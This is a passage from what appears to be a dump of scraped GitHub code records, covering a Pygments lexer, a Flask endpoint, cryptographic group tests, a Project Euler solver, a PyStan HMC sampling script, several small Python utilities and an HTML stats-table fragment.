Comment.Special:\n indicated_dialect = self.get_dialect_from_dialect_tag(value)\n if indicated_dialect != 'unknown':\n # token is a dialect indicator\n # reset reserved words and builtins\n self.set_dialect(indicated_dialect)\n self.dialect_set_by_tag = True\n #\n # check for reserved words, predefined and stdlib identifiers\n if token is Name:\n if value in self.reserved_words:\n token = Keyword.Reserved\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.builtins:\n token = Name.Builtin\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.pseudo_builtins:\n token = Name.Builtin.Pseudo\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.adts:\n if not self.treat_stdlib_adts_as_builtins:\n token = Name.Namespace\n else:\n token = Name.Builtin.Pseudo\n if self.algol_publication_mode:\n value = value.lower()\n #\n elif value in self.modules:\n token = Name.Namespace\n #\n elif value in self.types:\n token = Name.Class\n #\n elif value in self.procedures:\n token = Name.Function\n #\n elif value in self.variables:\n token = Name.Variable\n #\n elif value in self.constants:\n token = Name.Constant\n #\n elif token in Number:\n #\n # mark prefix number literals as error for PIM and ISO dialects\n if self.dialect not in ('unknown', 'm2r10', 'objm2'):\n if \"'\" in value or value[0:2] in ('0b', '0x', '0u'):\n token = Error\n #\n elif self.dialect in ('m2r10', 'objm2'):\n # mark base-8 number literals as errors for M2 R10 and ObjM2\n if token is Number.Oct:\n token = Error\n # mark suffix base-16 literals as errors for M2 R10 and ObjM2\n elif token is Number.Hex and 'H' in value:\n token = Error\n # mark real numbers with E as errors for M2 R10 and ObjM2\n elif token is Number.Float and 'E' in value:\n token = Error\n #\n elif token in Comment:\n #\n # mark single line comment as error for PIM and ISO dialects\n if token is Comment.Single:\n if self.dialect not in ('unknown', 'm2r10', 'objm2'):\n token = Error\n #\n if token is Comment.Preproc:\n # mark ISO pragma as error for PIM dialects\n if value.startswith('<*') and \\\n self.dialect.startswith('m2pim'):\n token = Error\n # mark PIM pragma as comment for other dialects\n elif value.startswith('(*$') and \\\n self.dialect != 'unknown' and \\\n not self.dialect.startswith('m2pim'):\n token = Comment.Multiline\n #\n else: # token is neither Name nor Comment\n #\n # mark lexemes matching the dialect's error token set as errors\n if value in self.lexemes_to_reject:\n token = Error\n #\n # substitute lexemes when in Algol mode\n if self.algol_publication_mode:\n if value == '#':\n value = u'≠'\n elif value == '<=':\n value = u'≤'\n elif value == '>=':\n value = u'≥'\n elif value == '==':\n value = u'≡'\n elif value == '*.':\n value = u'•'\n\n # return result\n yield index, token, value\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/modula2.py","file_name":"modula2.py","file_ext":"py","file_size_in_byte":52317,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"37512292982","text":"from flask import Flask, jsonify, request\r\nfrom flask_cors import CORS, cross_origin\r\nfrom Chart import Chart\r\n\r\n# Define a bunch of astronova API pseudofunctions for pure testing, \r\n# and to inform later updating of existing program\r\n\r\napp = Flask(__name__)\r\nCORS(app, support_credentials=True)\r\n\r\n@app.route('/query', methods=['POST'])\r\n@cross_origin(origin='*')\r\ndef query():\r\n data = request.get_json(force=True)\r\n if data == None:\r\n print(\"Didn't receive data.\")\r\n return jsonify(\"No data!\")\r\n else:\r\n location = data['inputLocation']\r\n location = location.strip()\r\n location = location.lower()\r\n\r\n birthDate = data['inputDate']\r\n birthDate = birthDate.strip()\r\n splitBirthDate = birthDate.split('/')\r\n month, day, year = (int(x) for x in splitBirthDate)\r\n \r\n birthTime = data['inputTime']\r\n splitBirthTime = birthTime.split(':')\r\n hour, minute = (int(x) for x in splitBirthTime)\r\n\r\n return jsonify([month, day, year, hour, minute, location])","repo_name":"tzmt/storage","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42258884003","text":"#!/usr/bin/eval python\n\n\"\"\"\nTests for arithmetic for G1, G2, and Gt elements.\n\"\"\"\n\nfrom testcommon import *\nfrom pbc import *\nfrom timeit import timeit\nfrom unittest import TestCase, SkipTest\nimport unittest\n\n\nclass AdditiveGroupArithmetic(TestCase):\n \"\"\"\n Tests G1/G2 arithmetic\n \"\"\"\n def setUp(self):\n raise SkipTest(\"base class\")\n\n\n def additionCommutes(self):\n P, Q = self.randomElement(), self.randomElement()\n R1 = P + Q\n R2 = Q + P\n self.assertNotEqual(P, Q)\n self.assertNotEqual(R1, Q)\n self.assertEqual(R1, R2)\n\n\n def additionAssociates(self):\n P, Q, R = self.randomElement(), self.randomElement(), self.randomElement()\n T1 = (P + Q) + R\n T2 = P + (Q + R)\n self.assertEqual(T1, T2)\n\n\n def additionDistributes(self):\n Q = self.randomElement()\n a, b = randomZ(), randomZ()\n c = a + b\n\n R1 = Q*a + Q*b\n R2 = Q*c\n\n self.assertNotEqual(Q, R1)\n self.assertEqual(R1, R2)\n\n\n def largeScalarMultiply(self):\n n = self.order\n Q = self.randomElement()\n a,b = randomZ(maximum=n), randomZ(maximum=n)\n c = a * b\n\n # Ensure our number is big enough for this test\n self.assertTrue(c > n)\n\n # Perform multiplication with two smaller numbers and one larger\n # number. They should give the same result and no segfaults.\n R1 = Q*a*b\n R2 = Q*c\n self.assertEqual(R1, R2)\n\n\n def testAdditionCommutes(self):\n repeat(self.additionCommutes, n=100)\n\n def testAdditionAssociates(self):\n repeat(self.additionAssociates, n=100)\n\n def testAdditionDistributive(self):\n repeat(self.additionDistributes, n=100)\n\n\n def testMultiplyReduces(self):\n Q = self.randomElement()\n a,b = randomZ(), randomZ()\n Qa = Q*a\n Qab = Qa*b\n c = a*b % self.order\n Qc = Q*c\n self.assertEqual(Qc, Qab)\n\n\n def testLargeScalarMultiply(self):\n repeat(self.largeScalarMultiply, n=1)\n\n\n def testMultiplyCommutes(self):\n \"\"\"\n Test multiplication by testing commutativity.\n \"\"\"\n g = self.randomElement()\n a = randomZ()\n b = randomZ()\n c = a*b\n\n h1 = (g*a)*b\n h2 = (g*b)*a\n h3 = g*c\n self.assertNotEqual(g, h1)\n self.assertEqual(h1, h2)\n self.assertEqual(h2, h3)\n\n\n def testInversion(self, n=100):\n \"\"\"\n Tests G1 element inversion by multiplying computing inverses and \n multiplying.\n \"\"\"\n def randomInv():\n g = self.randomElement()\n gInv = g.inverse()\n h = g + gInv\n self.assertTrue(h == 0)\n self.assertTrue(h+g == g)\n repeat(randomInv, n)\n\n\nclass G1Tests(AdditiveGroupArithmetic):\n \"\"\"\n Tests for G1Element arithmetic.\n \"\"\"\n def setUp(self):\n self.randomElement = randomG1\n self.order = orderG1()\n\n\nclass G2Tests(AdditiveGroupArithmetic):\n \"\"\"\n Tests for G2Element arithmetic.\n \"\"\"\n def setUp(self):\n self.randomElement = randomG2\n self.order = orderG2()\n\n def testFastMultiplyG2Correct(self):\n \"\"\"\n Tests that fast multiplication is correct by cross-checking with slow \n multiplication.\n \"\"\"\n p = randomG2()\n r = randomZ()\n q1 = p.mul_table(r)\n q2 = p.mul_basic(r)\n self.assertEqual(q1, q2)\n\n\n def testFastMultiplyG2Faster(self):\n \"\"\"\n Ensures that fast multiplication is indeed faster than basic multiply.\n \"\"\"\n p = randomG2()\n r = randomZ()\n\n fastTime = timeit(lambda:p.mul_table(r), number=100)\n basicTime = timeit(lambda:p.mul_basic(r), number=100)\n self.assertLess(fastTime, basicTime)\n\n\nclass GtTests(TestCase):\n \"\"\"\n Tests for GtElement arithmetic\n \"\"\"\n def testInverse(self):\n \"\"\"\n Verifies that ~GtElement produces a multiplicative inverse.\n \"\"\"\n def doInv():\n r = randomGt()\n rInv = ~r\n x = r * rInv\n self.assertTrue(x == 1)\n repeat(doInv, n=50)\n\n\n def testMultiplyCommutes(self):\n def test(): \n g, h = randomGt(), randomGt()\n r1 = g*h\n r2 = h*g\n self.assertNotEqual(g, r1)\n self.assertEqual(r1,r2)\n\n repeat(test, n=100)\n\n\n def testMultiplyAssociates(self):\n def test():\n f, g, h = randomGt(), randomGt(), randomGt()\n r1 = (f*g)*h\n r2 = f*(g*h)\n self.assertEqual(r1,r2)\n\n repeat(test, n=100)\n\n\n def testExpCommutes(self):\n def test():\n g = randomGt()\n a,b = randomZ(), randomZ()\n r1 = (g**a)**b\n r2 = (g**b)**a\n r3 = g**(a*b)\n c = (a*b) % orderGt()\n r4 = g**c\n self.assertEqual(r1, r2)\n self.assertEqual(r1, r3)\n self.assertEqual(r1, r4)\n\n repeat(test, n=100)\n\n\n def testExpDistributes(self):\n def test():\n g = randomGt()\n a,b = randomZ(), randomZ()\n r1 = (g**a)*(g**b)\n r2 = g**(a+b)\n self.assertEqual(r1, r2)\n\n repeat(test, n=100)\n\n\n# Run!\nif __name__ == '__main__':\n unittest.main()","repo_name":"ace0/pyrelic","sub_path":"pyrelic/testPbcArith.py","file_name":"testPbcArith.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31894467393","text":"# Starting in the top left corner of a 2×2 grid,\n# and only being able to move to the right and down,\n# there are exactly 6 routes to the bottom right corner.\n#\n# ─ │\n# ━ ┃\n#\n# ━━━━━━━ ━━━━─── ━━━━───\n# │ │ ┃ │ ┃ │ │ ┃ │\n# ─────── ────━━━ ─��─────\n# │ │ ┃ │ │ ┃ │ ┃ │\n# ──────X ──────X ───━━━X\n\n# ─────── ─────── ───────\n# ┃ │ │ ┃ │ │ ┃ │ │\n# ━━━━━━━ ━━━──── ───────\n# │ │ ┃ │ ┃ │ ┃ │ │\n# ──────X ───━━━X ━━━━━━X\n#\n# How many such routes are there through a 20×20 grid?\n\n\ndef memorise(f):\n known = {}\n\n def wrapper(*args):\n if args not in known:\n known[args] = f(*args)\n return known[args]\n\n return wrapper\n\n\n@memorise\ndef routes(width, height):\n if width == 0 or height == 0:\n return 1\n\n acc = 0\n\n # this is go right\n acc += routes(width - 1, height)\n\n # go down\n acc += routes(width, height - 1)\n\n return acc\n\n\nif __name__ == '__main__':\n print(routes(20, 20))\n","repo_name":"jarredblanchette/ProjectEuler","sub_path":"problems/015/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37476327775","text":"from PyQt5.QtWidgets import QPushButton\n\n\nclass Button(QPushButton):\n def __init__(self, name, function, coordinates, size, parent=None):\n super(QPushButton, self).__init__(parent)\n self.function = function\n self.setGeometry(coordinates[0], coordinates[1], size[0], size[1])\n self.setText(name)\n self.clicked.connect(self._on_click)\n\n def _on_click(self):\n self.function()","repo_name":"samstikhin/reversi","sub_path":"gui_objects/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71076416428","text":"import io\nfrom PIL import Image\nfrom crutches_on_wheels.errors.errors import Error\nfrom configs.config import REQUEST_TIMEOUT, CONNECT_TIMEOUT\nfrom dateutil import parser\n\n\ndef convertDateTime(inputDateTime: str) -> str:\n \"\"\"\n Function convert time to UTC format if input time format is local\n\n Args:\n inputDateTime: string with date and time\n Returns:\n string with datetime in UTC, isoformat with 'Z' at the end\n \"\"\"\n if not str(inputDateTime).endswith('Z'):\n return parser.parse(inputDateTime).replace(tzinfo=None).isoformat('T') + 'Z'\n else:\n return inputDateTime\n\n\ndef checkFormatAndConvertImage(byteImg):\n \"\"\"\n Check format mimetype and image conversion, if format is not [\"image/jpg\", \"image/jpeg\", \" image/pjpeg\"]\n \n :param byteImg: byte image.\n :return: converted byte image.\n \"\"\"\n img = Image.open(io.BytesIO(byteImg))\n if img.format == 'JPEG':\n return byteImg\n else:\n output = io.BytesIO()\n img.convert('RGB').save(output, format = 'JPEG')\n return output.getvalue()\n\n\ndef generateStatsTornadoRequestError(reply, statsServer, logger):\n if reply.request_time >= CONNECT_TIMEOUT or reply.request_time >= REQUEST_TIMEOUT:\n if reply.error.message == 'Timeout while connecting':\n return logger.warning(\"Connection timeout to {}\".format(statsServer))\n else:\n return logger.warning(\"Request timeout to {}\".format(statsServer))\n logger.warning(\"Unknown errror, stats server {}\".format(statsServer))\n\n\ndef generateRectISO(detect, landmarks):\n rect = {\"height\": 0, \"width\": 0, \"x\": 0, \"y\": 0}\n left = landmarks[0]\n right = landmarks[1]\n\n width = (right[0] - left[0]) / 0.25\n height = width / 0.75\n\n rect[\"x\"] = int(detect[\"x\"] + round((right[0] + left[0]) / 2, 0) - round(width * 0.5, 0))\n rect[\"y\"] = int(detect[\"y\"] + round((right[1] + left[1]) / 2, 0) - round(width * 0.6, 0))\n\n rect[\"width\"] = int(round(width, 0))\n rect[\"height\"] = int(round(height, 0))\n\n return rect\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-api/luna_api/app/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"239661054","text":"import random\n\nText=\"AAACCCAAACCC\"\nn = len(Text)\nprofile={'A': [0.5, 0.1], 'C': [0.3, 0.2], 'G': [0.2, 0.4], 'T': [0.0, 0.3]}\nk=2\n\n\n\ndef Pr(pattern, profile):\n Profile=1\n for j in range(k):\n #print(float(profile[pattern[j]][j]))\n #print(Profile)\n Profile=Profile*float(profile[pattern[j]][j])\n #print(Profile)\n return Profile\n\ndef Normalize(Probabilities):\n all_probability=0\n for i in Probabilities.keys():\n #print(i)\n all_probability+=Probabilities[i]\n #print(all_probability)\n for j in Probabilities.keys():\n Probabilities[j]=Probabilities[j]/all_probability\n\n\n return Probabilities\n\ndef WeightedDie(Probabilities):\n tem_p=random.uniform(0,1)\n #print(tem_p)\n check_p=0\n for i in Probabilities.keys():\n if Probabilities[i]+check_p>=tem_p>=check_p:\n return i\n check_p += Probabilities[i]\n\ndef ProfileGeneratedString(Text, profile, k):\n probabilities = {}\n for i in range(0, n - k + 1):\n probabilities[Text[i:i + k]] = Pr(Text[i:i + k], profile)\n\n probabilities=Normalize(probabilities)\n\n return WeightedDie(probabilities)\n\nprint(ProfileGeneratedString(Text, profile, k))","repo_name":"Hydebutterfy/learn-python","sub_path":"message/ProfileGeneratedString(Text, profile, k).py","file_name":"ProfileGeneratedString(Text, profile, k).py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36902835921","text":"# coding:utf-8\nfrom ws4py.client.threadedclient import WebSocketClient\nimport time\nimport threading\nimport config\nimport json\n\ndirection = -1\n\nname = 'ljz'\n\nclass HumanTank(WebSocketClient):\n def opened(self):\n global name\n self.send(config.AUTH_DICT[name])\n\n def send_cmd(self, cmd):\n self.send(cmd)\n\n def closed(self, code, reason=None):\n print(\"Closed down\", code, reason)\n\n def received_message(self, m):\n result = json.loads(m.data)\n print(result['data'])\n\n\nif __name__==\"__main__\":\n try:\n ws = HumanTank(config.URL)\n ws.connect()\n match = threading.Thread(target=ws.run_forever, name=\"match\")\n match.start()\n\n time.sleep(3)\n print(\"Start match...\")\n\n except KeyboardInterrupt:\n ws.close()\n\n","repo_name":"SelfSoda/tank_rl","sub_path":"tank_manual_2.py","file_name":"tank_manual_2.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38041012581","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os\nimport json, pickle\nimport pystan\n\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\n\nsys.path.append('../src/')\nimport utils\nfrom pyhmc import PyHMC_multistep, PyHMC_multistep_tries3, PyHMC\nimport diagnostics as dg\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-modelname', type=str, help='Name of the model')\nparser.add_argument('--dataname', type=str, help='Name of the model')\nparser.add_argument('--nsamples', default=1000, type=int, help='Number of ssmples')\nparser.add_argument('--burnin', default=1000, type=int, help='Number of burning samples')\nparser.add_argument('--Tint', default=5, type=float, help='Nleapfrog*step_size')\nparser.add_argument('--step_size', default=0.01, type=float,\n help='sum the integers (default: find the max)')\nparser.add_argument('--two_factor', default=2, type=float,\n help='sum the integers (default: find the max)')\n#parser.add_argument('--nchains', default=10, type=int, help='Number of chains')\nparser.add_argument('--olong', default=1, type=int, help='prob or no prob')\nparser.add_argument('--gather', default=1, type=int, help='prob or no prob')\nparser.add_argument('--vanilla', default=1, type=int, help='if 1, do vanilla HMC as well')\nparser.add_argument('--suffix', default='', type=str,\n help='sum the integers (default: find the max)')\nparser.add_argument('--nutsparams', default=1, type=int,\n help='Use fit params')\n\n\n\nargs = parser.parse_args()\nmodelname = args.modelname\nprint(\"Model name : \", modelname)\n#ndim = args.ndim\n#step_size = args.step_size\ntwo_factor = args.two_factor\nnsamples = args.nsamples\nsuffix = args.suffix\nif suffix != '': suffix = '-'+suffix\n#burnin = args.burnin\nnchains = 1 #args.nchains\n\n\n##\n\nif args.olong == 1: fpath= '/mnt/ceph/users/cmodi/hmc/outputs_long/%s%s//'%(modelname, suffix)\nif args.olong == 3: fpath= '/mnt/ceph/users/cmodi/hmc/outputs_long3/%s%s//'%(modelname, suffix)\n#try: os.makedirs(fpath)\n#except Exception as e: print(e)\nprint('Output folder : ', fpath)\n\n\n#######\n\n#model\nfname = './models/%s.pkl'%modelname\nwith open(fname, 'rb') as f:\n model = pickle.load(f)\n\n#data\ntry:\n with open('modeldata/%s.json'%args.dataname, 'r') as fp:\n data = json.load(fp)\nexcept: \n try: \n with open('modeldata/%s.json'%modelname, 'r') as fp:\n data = json.load(fp)\n except: data = None\n\n#params\nif args.nutsparams:\n print('Reading parameter file at %s'%(fpath + 'params.json'))\n with open(fpath + 'params.json', 'r') as fp:\n todump = json.load(fp)\n stepsizefid = comm.bcast(todump['stepsize'], root=0)\n invmetricfid = comm.bcast(np.array(todump['invmetric']), root=0)\n Tint = comm.bcast(todump['Tintegration'], root=0)\n Nleapfrogfid = comm.bcast(todump['Nleapfrog'], root=0)\n tnamepath = False\n print('Using fid params from parameter file at %s'%(fpath + 'params.json'))\nelse:\n print('Using arguments for step size and Tint')\n stepsizefid = args.step_size\n invmetricfid = 1 #np.ones(ndim)\n Tint = args.Tint\n Nleapfrogfid = Tint/stepsizefid\n tnamepath = True\n\n#############################\n##Stansampling\n\nstansamples = model.sampling(data=data, chains=1, warmup=1, algorithm='HMC',\n iter=2*args.burnin, seed=rank, n_jobs=1,\n control={\"metric\":\"diag_e\", \n \"stepsize\":stepsizefid,\n \"int_time\":Tint,\n \"inv_metric\":invmetricfid, \n \"stepsize_jitter\":0\n })\n\nlog_prob = stansamples.log_prob\ngrad_log_prob = stansamples.grad_log_prob\n\n\nsamplesy = []\nfor key in stansamples.extract().keys() : \n y = stansamples.extract()[key]\n print(key, y.shape)\n if len(y.shape) == 1: y = np.expand_dims(y, 1)\n samplesy.append(y)\nsamplesy = np.concatenate(samplesy[:-1], axis=1) \nsamplesy = np.expand_dims(samplesy, 1)\nndim = samplesy.shape[-1]\n\n#Initistate\nsamplesy = stansamples.extract(permuted=False)[..., ]\nos.makedirs(fpath + 'step10/initsamples', exist_ok=True)\nnp.save(fpath + 'step10/initsamples/%02d'%rank, samplesy)\n\ntmp = stansamples.extract().copy() #[args.burnin:]\nii = np.random.randint(0, stansamples.extract()['lp__'].size-args.burnin)\ncounter = 0 \nprint(\"samples shape : \", samplesy.shape)\nfor ik, key in enumerate(tmp.keys()):\n size = tmp[key][ii].size\n print(key, size)\n #tmp[key] = tmp[key][ii]\n if size > 1: \n tmp[key] = samplesy[-args.burnin:, 0, counter: counter + size].mean(axis=0)\n else: \n tmp[key] = samplesy[-args.burnin:, 0, counter].mean(axis=0)\n counter = counter + size\ntmp.pop('lp__')\ninitstate = stansamples.unconstrain_pars(tmp).reshape([nchains, ndim])\n#initstate = np.random.uniform(0.1, 1., size=nchains*ndim).reshape([nchains, ndim])\n#print(\"initstate in rank \", rank, initstate)\n\n#sys.exit()\n\n\n#############################\n###Do HMC\n\ndef samplesaves(fpathd, mysamples, accepted, probs, counts):\n\n for ff in [fpathd, fpathd + '/samples/', fpathd + '/accepted/', fpathd + '/probs/', fpathd + '/counts/']:\n try: \n os.makedirs(ff)\n except Exception as e: print(e)\n\n np.save(fpathd + '/samples/%d'%rank, mysamples)\n np.save(fpathd + '/accepted/%d'%rank, accepted)\n np.save(fpathd + '/probs/%d'%rank, probs)\n np.save(fpathd + '/counts/%d'%rank, counts)\n \n if args.gather == 1: \n try:\n mysamples = comm.gather(mysamples, root=0)\n accepted = comm.gather(accepted, root=0)\n probs = comm.gather(probs, root=0)\n counts = comm.gather(counts, root=0)\n except Exception as e:\n print(rank, e)\n comm.Abort(1) ##sys.exit(-1)\n\n if rank == 0:\n mysamples = np.concatenate(mysamples, axis=1)\n accepted = np.concatenate(accepted, axis=1)\n probs = np.concatenate(probs, axis=1)\n counts = np.concatenate(counts, axis=1)\n\n np.save(fpathd + '/samples', mysamples)\n np.save(fpathd + '/accepted', accepted)\n np.save(fpathd + '/probs', probs)\n np.save(fpathd + '/counts', counts)\n\n print('Saved in %s'%fpathd)\n start = time.time()\n #dg.plot_hist(mysamples[::10], fpathd)\n print(time.time() - start)\n\n\n\n#############################\n###Do HMC\n\n\nprint('Step size fid : ', stepsizefid)\n#print('invemtric fid : ', invmetricfid)\nprint('Tint fid : ', Tint)\nprint('Nleapfrog fid : ', Nleapfrogfid)\n\n\nhmc = PyHMC(log_prob, grad_log_prob, invmetricfid)\nif args.olong == 1: hmc_multi = PyHMC_multistep(log_prob, grad_log_prob, invmetricfid)\nif args.olong == 3: hmc_multi = PyHMC_multistep_tries3(log_prob, grad_log_prob, invmetricfid)\n\n\nstepsf = [1, 2, 5, 0.5]\nnsubs = [2, 3, 4]\nfactors = [2, 5,10]\ncostthresh = 200 \n\nfor ss in stepsf:\n\n step_size = stepsizefid*ss\n Nleapfrog = max(1, int(Tint/step_size)) #+ 1\n #if Nleapfrog <= 2: \n # print(\"Only %d steps for this step size \\eps=%0.3f, so skipping\"%(Nleapfrog, step_size))\n # continue\n\n\n print(\"\\nFor step size %0.3f and %d leapfrog steps\\n\"%(step_size, Nleapfrog))\n\n if args.vanilla == 1:\n stepfunc = lambda x: hmc.hmc_step(x, Nleapfrog, step_size)\n mysamplesu, accepted, probs, counts = utils.do_hmc(stepfunc, initstate, nsamples=args.nsamples, burnin=args.burnin)\n mysamples = np.array([[stansamples.constrain_pars(mysamplesu[i, j]) \\\n for i in range(mysamplesu.shape[0])] for j in range(mysamplesu.shape[1])])\n mysamples = mysamples.transpose(1, 0, 2)\n if tnamepath : \n fpathd = fpath + 'step%02d_tint%03d/'%(ss*10, Tint*10)\n else: fpathd = fpath + 'step%02d/'%(ss*10)\n samplesaves(fpathd, mysamples, accepted, probs, counts)\n\n for nsub in nsubs:\n for two_factor in factors:\n if two_factor**(nsub-1) > costthresh: continue\n print(\"\\nFor step size %0.3f and %d leapfrog steps\\n\"%(step_size, Nleapfrog))\n print(\"\\nSubsize with %d upto %d times\\n\"%(two_factor, nsub))\n try:\n stepfunc_multi = lambda x: hmc_multi.multi_step(nsub, x, Nleapfrog, step_size, two_factor)\n mysamplesu, accepted, probs, counts = utils.do_hmc(stepfunc_multi, initstate, nsamples=args.nsamples, burnin=args.burnin)\n mysamples = np.array([[stansamples.constrain_pars(mysamplesu[i, j]) \\\n for i in range(mysamplesu.shape[0])] for j in range(mysamplesu.shape[1])])\n mysamples = mysamples.transpose(1, 0, 2)\n if tnamepath: \n fpathd = fpath + 'step%02d_tint%03d_fac%02d_nsub%d/'%(ss*10, Tint*10, two_factor, nsub)\n else: fpathd = fpath + 'step%02d_fac%02d_nsub%d/'%(ss*10, two_factor, nsub)\n samplesaves(fpathd, mysamples, accepted, probs, counts)\n except: pass\n","repo_name":"modichirag/hmc","sub_path":"scripts_old/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":9266,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73312918826","text":"from collections import defaultdict\n\ndef find_build_order(projects, dependencies):\n visited, order = set(), []\n graph = build_graph(dependencies)\n for project in projects:\n if project not in visited:\n visited.add(project)\n recursion_stack = set()\n if not dfs(graph, project, visited, order, recursion_stack):\n return None\n return list(reversed(order))\n\n\ndef dfs(graph, project, visited, order, recursion_stack):\n recursion_stack.add(project)\n for nhbr in graph[project]:\n if nhbr in recursion_stack:\n return False\n if nhbr not in visited:\n visited.add(nhbr)\n if not dfs(graph, nhbr, visited, order, recursion_stack):\n return False\n order.append(project)\n recursion_stack.remove(project)\n return True\n\n\ndef build_graph(dependencies):\n graph = defaultdict(set)\n for edge in dependencies:\n start, end = edge[0], edge[1]\n graph[start].add(end)\n return graph\n\n\nproj = [\"f\", \"d\", \"a\", \"h\", \"g\", \"k\", \"i\", \"z\"]\ndep = [\n [\"f\", \"d\"],\n [\"f\", \"a\"],\n [\"d\", \"a\"],\n [\"g\", \"a\"],\n [\"a\", \"h\"],\n [\"g\", \"h\"],\n [\"k\", \"i\"],\n [\"z\", \"g\"],\n [\"h\", \"f\"]\n]\n\nprint(find_build_order(proj, dep))\n","repo_name":"gan3i/CTCI-Python","sub_path":"Revision/TreeAndGraph/BuildOrder_4.7/build_order_4.7_dfs.py","file_name":"build_order_4.7_dfs.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7243875080","text":"def escrever(nome, txt):\r\n arquivo = open(nome, 'a')\r\n arquivo.writelines(txt)\r\n arquivo.close()\r\n\r\n\r\n\r\ndef media_nota(nome_arquivo):\r\n arquivo= open(nome_arquivo, 'r')\r\n aluno_nota = arquivo.read()\r\n #print(aluno_nota)\r\n aluno_nota = aluno_nota.split('\\n')\r\n #print(aluno_nota)\r\n lista_media=[]\r\n for x in aluno_nota:\r\n lista_notas = x.split(',')\r\n aluno = lista_notas[0]\r\n lista_notas.pop(0)\r\n media = lambda notas: sum([int(i) for i in notas])/4\r\n print(media(lista_notas))\r\n lista_media.append({aluno:media(lista_notas)})\r\n return lista_media\r\n\r\n \r\ndef copia(nome):\r\n import shutil\r\n shutil.copy(nome, 'C:/Users/SAMSUNG/Documents/')\r\n\r\nif __name__ =='__main__':\r\n\r\n '''\r\n lista_media = media_nota('Notas.txt')\r\n print(lista_media)\r\n '''\r\n copia('Notas.txt')","repo_name":"Augusto0192/Python_Basico_Jupter","sub_path":"python/py_treinos/treino_1/Manipulação_arquivos.py","file_name":"Manipulação_arquivos.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24426204251","text":"# from scipy import stats\n# import sys\n#\n#\n# def rankCorr(x, y):\n# rho, pval = stats.spearmanr(x, y)\n# tau, pval = stats.kendalltau(x, y)\n# print('S-rho = {:.4f}, K-tau = {:.4f}'.format(rho, tau))\n#\n#\n# if len(sys.argv) < 1:\n# print('usage: python rankcorr.py ')\n# sys.exit(0)\n#\n# values_file = open(sys.argv[1], \"r\")\n# lines = values_file.readlines()\n#\n# col1 = []\n# col3 = []\n# col2 = []\n# col4 = []\n# for line in lines:\n# tokens = line.split('\\t')\n# col1.append(tokens[0])\n# col3.append(tokens[2])\n# # col2.append(tokens[1])\n# # col4.append(tokens[3])\n#\n# values_file.close()\n#\n# rankCorr(col1, col3)\n\n\nfrom scipy import stats\nimport sys, math\n\n\ndef reportRankCorr(x, y):\n rho, pval = stats.spearmanr(x, y)\n tau, pval = stats.kendalltau(x, y)\n print('S-rho = {:.4f}, K-tau = {:.4f}'.format(rho, tau))\n\n #also compute the avg shift in ranks\n i = 1\n rmse = 0\n for x_i in x:\n j = y.index(x_i)\n rmse += abs(i-j)\n i+= 1\n print('rmse = {:.4f}'.format(rmse/len(x)))\n\n\nif len(sys.argv) < 1:\n print ('usage: python evalrankcorr.py ')\n sys.exit(0)\nvalues_file = open(sys.argv[1], \"r\")\nlines = values_file.readlines()\nx = []\ny = []\nfor line in lines:\n tokens = line.split()\n x.append(tokens[0])\n y.append(tokens[1])\nvalues_file.close()\nreportRankCorr(x, y)","repo_name":"suchanadatta/QPP-NeuralIR-Models","sub_path":"QPP/evalrankcorr.py","file_name":"evalrankcorr.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13897076129","text":"import datetime\nimport logging\nfrom logging import Formatter\nimport os\n\n\nclass GoogleFormatter(Formatter):\n\n \"\"\"Logging Formatter which can be used to output logs to stderr in a format\n that can be parsed by google logging\n\n Note that any datefmt passed in to the setup will be ignored as this needs\n to be in a specific format to be recognised by google.\n \"\"\"\n\n levels = {\n logging.DEBUG: \"D\",\n logging.INFO: \"I\",\n logging.CRITICAL: \"C\",\n logging.ERROR: \"E\",\n logging.WARNING: \"W\",\n }\n\n fmt = \"{levelname:s}{asctime:s} {pid:d} {file:s}:{line:d}] {message:s}\"\n\n def format(self, record):\n r\"\"\"Format for google stdout\n\n needs to match (ruby regex):\n\n `/^(?\\w)(?

    My Contact Mail

    PageTodayYesterdayWeekMonth
    {endpoint}{count}